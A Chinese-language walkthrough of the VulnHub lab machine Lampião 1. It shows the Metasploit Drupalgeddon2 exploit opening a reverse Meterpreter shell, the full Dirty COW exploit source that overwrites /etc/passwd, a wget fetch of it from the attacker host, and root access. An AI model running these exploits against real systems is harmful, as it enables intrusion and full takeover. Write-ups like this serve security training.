vulnhub靶机渗透[Lampiao-1]

名称

名称:Lampião: 1
发布日期:2018年7月28日

下载

Lampiao.zip

  • Download: https://mega.nz/#!aG4AAaDB!CBLRRYQsAhTOyPJqyjC0Blr-weMH9QMdYbPfMj0LGeM
  • Download (Mirror): https://download.vulnhub.com/lampiao/Lampiao.zip
  • Download (Torrent): https://download.vulnhub.com/lampiao/Lampiao.zip.torrent

描述

您想继续在自己的实验室中进行黑客入侵吗?
试试这个全新的脆弱机器!“Lampião1”。root它!

级别:简单

信息收集

上nmap

1
2
3
4
root@kali:~# nmap -sn -v 192.168.66.*
Nmap scan report for 192.168.66.17
Host is up (0.00024s latency).
MAC Address: 00:0C:29:51:75:B7 (VMware)
1
2
3
4
5
root@kali:~# nmap -sV -p- -v 192.168.66.17
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http?
1898/tcp open http Apache httpd 2.4.7 ((Ubuntu))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
root@kali:~# nmap -A -p 22,80,1898 -v 192.168.66.17 --script=vuln
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
| NULL:
| _____ _ _
| |_|/ ___ ___ __ _ ___ _ _
| \x20| __/ (_| __ \x20|_| |_
| ___/ __| |___/ ___|__,_|___/__, ( )
| |___/
| ______ _ _ _
| ___(_) | | | |
| \x20/ _` | / _ / _` | | | |/ _` | |
|_ __,_|__,_|_| |_|
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
1898/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.66.17
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.66.17:1898/
| Form id: user-login-form
| Form action: /?q=node&destination=node
|
| Path: http://192.168.66.17:1898/?q=node/3
| Form id: user-login-form
| Form action: /?q=node/3&destination=node/3
|
| Path: http://192.168.66.17:1898/?q=node/1
| Form id: user-login-form
| Form action: /?q=node/1&destination=node/1
|
| Path: http://192.168.66.17:1898/?q=user/login&destination=node/3%23comment-form
| Form id: user-login
| Form action: /?q=user/login&destination=node/3%23comment-form
|
| Path: http://192.168.66.17:1898/?q=user/register&destination=node/1%23comment-form
| Form id: user-register-form
| Form action: /?q=user/register&destination=node/1%23comment-form
|
| Path: http://192.168.66.17:1898/?q=user/login&destination=node/1%23comment-form
| Form id: user-login
| Form action: /?q=user/login&destination=node/1%23comment-form
|
| Path: http://192.168.66.17:1898/?q=user/password
| Form id: user-pass
| Form action: /?q=user/password
|
| Path: http://192.168.66.17:1898/?q=node&destination=node
| Form id: user-login-form
| Form action: /?q=node&destination=node%3Famp%253Bdestination%3Dnode
|
| Path: http://192.168.66.17:1898/?q=user/register&destination=node/3%23comment-form
| Form id: user-register-form
| Form action: /?q=user/register&destination=node/3%23comment-form
|
| Path: http://192.168.66.17:1898/?q=user/register
| Form id: user-register-form
| Form action: /?q=user/register
|
| Path: http://192.168.66.17:1898/?q=node/3&destination=node/3
| Form id: user-login-form
| Form action: /?q=node/3&destination=node/3%3Famp%253Bdestination%3Dnode/3
|
| Path: http://192.168.66.17:1898/?q=node/1&destination=node/1
| Form id: user-login-form
| Form action: /?q=node/1&destination=node/1%3Famp%253Bdestination%3Dnode/1
|
| Path: http://192.168.66.17:1898/?q=user/login&destination=node/3%23comment-form
| Form id: user-login
|_ Form action: /?q=user/login&destination=node/3%23comment-form
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /robots.txt: Robots file
| /UPGRADE.txt: Drupal file
| /INSTALL.txt: Drupal file
| /INSTALL.mysql.txt: Drupal file
| /INSTALL.pgsql.txt: Drupal file
| /CHANGELOG.txt: Drupal v1
| /: Drupal version 7
| /README.txt: Interesting, a readme.
| /includes/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
| /misc/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
| /modules/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
| /scripts/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
| /sites/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_ /themes/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.7:
| CVE-2020-1934 7.5 https://vulners.com/cve/CVE-2020-1934
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
| CVE-2014-0226 6.8 https://vulners.com/cve/CVE-2014-0226
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
| CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161
| CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736
| CVE-2014-3523 5.0 https://vulners.com/cve/CVE-2014-3523
| CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185
| CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109
| CVE-2014-0118 4.3 https://vulners.com/cve/CVE-2014-0118
| CVE-2014-0117 4.3 https://vulners.com/cve/CVE-2014-0117
| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612

Nmap扫描显示端口22、80、1898已打开,因此考虑在浏览器中打开IP地址以及端口1898。它提供了有关运行了Drupal的网页的线索。

根据先前的线索,考虑过使用漏洞利用drupal_drupalgeddon2进行利用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
msf5 > search drupalgeddon2

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection


msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host


Exploit target:

Id Name
-- ----
0 Automatic (PHP In-Memory)


msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.66.17
RHOSTS => 192.168.66.17
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 1898
RPORT => 1898
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started reverse TCP handler on 192.168.66.6:4444
[*] Sending stage (38288 bytes) to 192.168.66.17
[*] Meterpreter session 1 opened (192.168.66.6:4444 -> 192.168.66.17:58696) at 2020-04-07 22:59:18 -0400

meterpreter >
meterpreter > sessions 1
[*] Session 1 is already interactive.
meterpreter > ls
Listing: /var/www/html
======================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100755/rwxr-xr-x 110781 fil 2018-04-19 15:39:33 -0400 CHANGELOG.txt
100755/rwxr-xr-x 1481 fil 2018-04-19 15:39:33 -0400 COPYRIGHT.txt
100755/rwxr-xr-x 1717 fil 2018-04-19 15:39:33 -0400 INSTALL.mysql.txt
100755/rwxr-xr-x 1874 fil 2018-04-19 15:39:33 -0400 INSTALL.pgsql.txt
100755/rwxr-xr-x 1298 fil 2018-04-19 15:39:33 -0400 INSTALL.sqlite.txt
100755/rwxr-xr-x 17995 fil 2018-04-19 15:39:33 -0400 INSTALL.txt
100755/rwxr-xr-x 18092 fil 2018-04-19 15:39:33 -0400 LICENSE.txt
100644/rw-r--r-- 3427612 fil 2018-04-20 13:20:38 -0400 LuizGonzaga-LampiaoFalou.mp3
100755/rwxr-xr-x 8710 fil 2018-04-19 15:39:33 -0400 MAINTAINERS.txt
100755/rwxr-xr-x 5382 fil 2018-04-19 15:39:33 -0400 README.txt
100755/rwxr-xr-x 10123 fil 2018-04-19 15:39:33 -0400 UPGRADE.txt
100644/rw-r--r-- 34715 fil 2018-04-20 13:09:26 -0400 audio.m4a
100755/rwxr-xr-x 6604 fil 2018-04-19 15:39:33 -0400 authorize.php
100755/rwxr-xr-x 720 fil 2018-04-19 15:39:33 -0400 cron.php
40755/rwxr-xr-x 4096 dir 2018-04-19 15:39:33 -0400 includes
100755/rwxr-xr-x 529 fil 2018-04-19 15:39:33 -0400 index.php
100755/rwxr-xr-x 703 fil 2018-04-19 15:39:33 -0400 install.php
100755/rwxr-xr-x 267732 fil 2015-08-03 22:51:40 -0400 lampiao.jpg
40755/rwxr-xr-x 4096 dir 2018-04-19 15:39:33 -0400 misc
40755/rwxr-xr-x 4096 dir 2018-04-19 15:39:33 -0400 modules
40755/rwxr-xr-x 4096 dir 2018-04-19 15:39:33 -0400 profiles
100644/rw-r--r-- 9674 fil 2018-04-20 12:48:37 -0400 qrc.png
100755/rwxr-xr-x 2189 fil 2018-04-19 15:39:33 -0400 robots.txt
40755/rwxr-xr-x 4096 dir 2018-04-19 15:39:33 -0400 scripts
40755/rwxr-xr-x 4096 dir 2018-04-19 15:39:33 -0400 sites
40755/rwxr-xr-x 4096 dir 2018-04-19 15:39:33 -0400 themes
100755/rwxr-xr-x 19986 fil 2018-04-19 15:39:33 -0400 update.php
100755/rwxr-xr-x 2200 fil 2018-04-19 15:39:33 -0400 web.config
100755/rwxr-xr-x 417 fil 2018-04-19 15:39:33 -0400 xmlrpc.php

meterpreter > shell
Process 4649 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
pwd
/var/www/html

现在已经有了meterpreter,因此考虑使用以下命令检查有关受害者机器的描述:

1
2
3
4
5
6
7
8
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@lampiao:/var/www/html$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.5 LTS
Release: 14.04
Codename: trusty

该说明从“受害者机器的版本号”中提供了非常有力的暗示,供下一步使用。

在使用较早的有关版本号的线索进行长时间搜索之后,终于找到了所需的漏洞,并将其下载到了计算机上。

  • Linux内核2.6.22-3.9-Dirty-COW-/proc/self/mem-竞争条件提权-/etc/passwd方法

即脏牛提权

40847.cpp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
// EDB-Note: Compile:   g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
// EDB-Note: Recommended way to run: ./dcow -s (Will automatically do "echo 0 > /proc/sys/vm/dirty_writeback_centisecs")
//
// -----------------------------------------------------------------
// Copyright (C) 2016 Gabriele Bonacini
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation; either version 3 of the License, or
// (at your option) any later version.
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with this program; if not, write to the Free Software Foundation,
// Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
// -----------------------------------------------------------------

#include <iostream>
#include <fstream>
#include <string>
#include <thread>
#include <sys/mman.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <pwd.h>
#include <pty.h>
#include <string.h>
#include <termios.h>
#include <sys/wait.h>
#include <signal.h>

#define BUFFSIZE 1024
#define PWDFILE "/etc/passwd"
#define BAKFILE "./.ssh_bak"
#define TMPBAKFILE "/tmp/.ssh_bak"
#define PSM "/proc/self/mem"
#define ROOTID "root:"
#define SSHDID "sshd:"
#define MAXITER 300
#define DEFPWD "$6$P7xBAooQEZX/ham$9L7U0KJoihNgQakyfOQokDgQWLSTFZGB9LUU7T0W2kH1rtJXTzt9mG4qOoz9Njt.tIklLtLosiaeCBsZm8hND/"
#define TXTPWD "dirtyCowFun\n"
#define DISABLEWB "echo 0 > /proc/sys/vm/dirty_writeback_centisecs\n"
#define EXITCMD "exit\n"
#define CPCMD "cp "
#define RMCMD "rm "

using namespace std;

class Dcow{
private:
bool run, rawMode, opShell, restPwd;
void *map;
int fd, iter, master, wstat;
string buffer, etcPwd, etcPwdBak,
root, user, pwd, sshd;
thread *writerThr, *madviseThr, *checkerThr;
ifstream *extPwd;
ofstream *extPwdBak;
struct passwd *userId;
pid_t child;
char buffv[BUFFSIZE];
fd_set rfds;
struct termios termOld, termNew;
ssize_t ign;

void exitOnError(string msg);
public:
Dcow(bool opSh, bool rstPwd);
~Dcow(void);
int expl(void);
};

Dcow::Dcow(bool opSh, bool rstPwd) : run(true), rawMode(false), opShell(opSh), restPwd(rstPwd),
iter(0), wstat(0), root(ROOTID), pwd(DEFPWD), sshd(SSHDID), writerThr(nullptr),
madviseThr(nullptr), checkerThr(nullptr), extPwd(nullptr), extPwdBak(nullptr),
child(0){
userId = getpwuid(getuid());
user.append(userId->pw_name).append(":");
extPwd = new ifstream(PWDFILE);
while (getline(*extPwd, buffer)){
buffer.append("\n");
etcPwdBak.append(buffer);
if(buffer.find(root) == 0){
etcPwd.insert(0, root).insert(root.size(), pwd);
etcPwd.insert(etcPwd.begin() + root.size() + pwd.size(),
buffer.begin() + buffer.find(":", root.size()), buffer.end());
}else if(buffer.find(user) == 0 || buffer.find(sshd) == 0 ){
etcPwd.insert(0, buffer);
}else{
etcPwd.append(buffer);
}
}
extPwdBak = new ofstream(restPwd ? TMPBAKFILE : BAKFILE);
extPwdBak->write(etcPwdBak.c_str(), etcPwdBak.size());
extPwdBak->close();
fd = open(PWDFILE,O_RDONLY);
map = mmap(nullptr, etcPwdBak.size(), PROT_READ,MAP_PRIVATE, fd, 0);
}

Dcow::~Dcow(void){
extPwd->close();
close(fd);
delete extPwd; delete extPwdBak; delete madviseThr; delete writerThr; delete checkerThr;
if(rawMode) tcsetattr(STDIN_FILENO, TCSANOW, &termOld);
if(child != 0) wait(&wstat);
}

void Dcow::exitOnError(string msg){
cerr << msg << endl;
// if(child != 0) kill(child, SIGKILL);
throw new exception();
}

int Dcow::expl(void){
madviseThr = new thread([&](){ while(run){ madvise(map, etcPwdBak.size(), MADV_DONTNEED);} });
writerThr = new thread([&](){ int fpsm = open(PSM,O_RDWR);
while(run){ lseek(fpsm, reinterpret_cast<off_t>(map), SEEK_SET);
ign = write(fpsm, etcPwd.c_str(), etcPwdBak.size()); }
});
checkerThr = new thread([&](){ while(iter <= MAXITER){
extPwd->clear(); extPwd->seekg(0, ios::beg);
buffer.assign(istreambuf_iterator<char>(*extPwd),
istreambuf_iterator<char>());
if(buffer.find(pwd) != string::npos &&
buffer.size() >= etcPwdBak.size()){
run = false; break;
}
iter ++; usleep(300000);
}
run = false;
});

cerr << "Running ..." << endl;
madviseThr->join();
writerThr->join();
checkerThr->join();

if(iter <= MAXITER){
child = forkpty(&master, nullptr, nullptr, nullptr);

if(child == -1) exitOnError("Error forking pty.");

if(child == 0){
execlp("su", "su", "-", nullptr);
exitOnError("Error on exec.");
}

if(opShell) cerr << "Password overridden to: " << TXTPWD << endl;
memset(buffv, 0, BUFFSIZE);
ssize_t bytes_read = read(master, buffv, BUFFSIZE - 1);
if(bytes_read <= 0) exitOnError("Error reading su prompt.");
cerr << "Received su prompt (" << buffv << ")" << endl;

if(write(master, TXTPWD, strlen(TXTPWD)) <= 0)
exitOnError("Error writing pwd on tty.");

if(write(master, DISABLEWB, strlen(DISABLEWB)) <= 0)
exitOnError("Error writing cmd on tty.");

if(!opShell){
if(write(master, EXITCMD, strlen(EXITCMD)) <= 0)
exitOnError("Error writing exit cmd on tty.");
}else{
if(restPwd){
string restoreCmd = string(CPCMD).append(TMPBAKFILE).append(" ").append(PWDFILE).append("\n");
if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0)
exitOnError("Error writing restore cmd on tty.");
restoreCmd = string(RMCMD).append(TMPBAKFILE).append("\n");
if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0)
exitOnError("Error writing restore cmd (rm) on tty.");
}

if(tcgetattr(STDIN_FILENO, &termOld) == -1 )
exitOnError("Error getting terminal attributes.");

termNew = termOld;
termNew.c_lflag &= static_cast<unsigned long>(~(ICANON | ECHO));

if(tcsetattr(STDIN_FILENO, TCSANOW, &termNew) == -1)
exitOnError("Error setting terminal in non-canonical mode.");
rawMode = true;

while(true){
FD_ZERO(&rfds);
FD_SET(master, &rfds);
FD_SET(STDIN_FILENO, &rfds);

if(select(master + 1, &rfds, nullptr, nullptr, nullptr) < 0 )
exitOnError("Error on select tty.");

if(FD_ISSET(master, &rfds)) {
memset(buffv, 0, BUFFSIZE);
bytes_read = read(master, buffv, BUFFSIZE - 1);
if(bytes_read <= 0) break;
if(write(STDOUT_FILENO, buffv, bytes_read) != bytes_read)
exitOnError("Error writing on stdout.");
}

if(FD_ISSET(STDIN_FILENO, &rfds)) {
memset(buffv, 0, BUFFSIZE);
bytes_read = read(STDIN_FILENO, buffv, BUFFSIZE - 1);
if(bytes_read <= 0) exitOnError("Error reading from stdin.");
if(write(master, buffv, bytes_read) != bytes_read) break;
}
}
}
}

return [](int ret, bool shell){
string msg = shell ? "Exit.\n" : string("Root password is: ") + TXTPWD + "Enjoy! :-)\n";
if(ret <= MAXITER){cerr << msg; return 0;}
else{cerr << "Exploit failed.\n"; return 1;}
}(iter, opShell);
}

void printInfo(char* cmd){
cerr << cmd << " [-s] [-n] | [-h]\n" << endl;
cerr << " -s open directly a shell, if the exploit is successful;" << endl;
cerr << " -n combined with -s, doesn't restore the passwd file." << endl;
cerr << " -h print this synopsis;" << endl;
cerr << "\n If no param is specified, the program modifies the passwd file and exits." << endl;
cerr << " A copy of the passwd file will be create in the current directory as .ssh_bak" << endl;
cerr << " (unprivileged user), if no parameter or -n is specified.\n" << endl;
exit(1);
}

int main(int argc, char** argv){
const char flags[] = "shn";
int c;
bool opShell = false,
restPwd = true;

opterr = 0;
while ((c = getopt(argc, argv, flags)) != -1){
switch (c){
case 's':
opShell = true;
break;
case 'n':
restPwd = false;
break;
case 'h':
printInfo(argv[0]);
break;
default:
cerr << "Invalid parameter." << endl << endl;
printInfo(argv[0]);
}
}

if(!restPwd && !opShell){
cerr << "Invalid parameter: -n requires -s" << endl << endl;
printInfo(argv[0]);
}

Dcow dcow(opShell, restPwd);
return dcow.expl();
}

执行一个python服务器,它将帮助通过Victim的计算机下载漏洞利用程序。

kali端执行

1
2
3
4
5
6
7
8
root@kali:~/vulnhub/lampiao# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.66.1 - - [08/Apr/2020 01:48:23] code 404, message File not found
192.168.66.1 - - [08/Apr/2020 01:48:23] "GET /robots.txt HTTP/1.1" 404 -
192.168.66.1 - - [08/Apr/2020 01:48:23] "GET / HTTP/1.1" 200 -
192.168.66.1 - - [08/Apr/2020 01:48:24] code 404, message File not found
192.168.66.1 - - [08/Apr/2020 01:48:24] "GET /favicon.ico HTTP/1.1" 404 -
192.168.66.17 - - [08/Apr/2020 01:49:04] "GET /40847.cpp HTTP/1.1" 200 -

受害者执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
www-data@lampiao:/var/www/html$ cd /tmp
cd /tmp
www-data@lampiao:/tmp$ ls
ls
www-data@lampiao:/tmp$ wget http://192.168.66.6:8000/40847.cpp
wget http://192.168.66.6:8000/40847.cpp
--2020-04-08 01:45:33-- http://192.168.66.6:8000/40847.cpp
Connecting to 192.168.66.6:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10531 (10K) [text/x-c++src]
Saving to: '40847.cpp'

100%[======================================>] 10,531 --.-K/s in 0s

2020-04-08 01:45:33 (391 MB/s) - '40847.cpp' saved [10531/10531]

www-data@lampiao:/tmp$ ls
ls
40847.cpp

现在已将此文件下载到服务器的/tmp(通用可写)目录中。由于该漏洞利用程序采用.cpp格式进行编译和执行,因此该漏洞利用程序代码中提供了特定的命令。这提供了有关如何编译和执行漏洞40847.ccp的提示。

现在有了root权限的shell!现在读取该flag。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
www-data@lampiao:/tmp$ ls
ls
40847.cpp
www-data@lampiao:/tmp$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
<-Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
www-data@lampiao:/tmp$ ./dcow -s
./dcow -s
Running ...
Password overridden to: dirtyCowFun

Received su prompt (Password: )

echo 0 > /proc/sys/vm/dirty_writeback_centisecs
cp /tmp/.ssh_bak /etc/passwd
rm /tmp/.ssh_bak
root@lampiao:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@lampiao:~# cp /tmp/.ssh_bak /etc/passwd
root@lampiao:~# rm /tmp/.ssh_bak
root@lampiao:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@lampiao:~# whoami
whoami
root
root@lampiao:~# cd /root
cd /root
root@lampiao:~# ls
ls
flag.txt
root@lampiao:~# cat flag.txt
cat flag.txt
9740616875908d91ddcdaa8aea3af366

知识点总结

  • msf drupal_drupalgeddon2漏洞利用
  • Linux内核2.6.22-3.9-Dirty-COW-/proc/self/mem-竞争条件提权-/etc/passwd方法(脏牛提权)

Game over

不好意思,这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本,i am so sorry about this…It’s a pity…

The end,to be continue…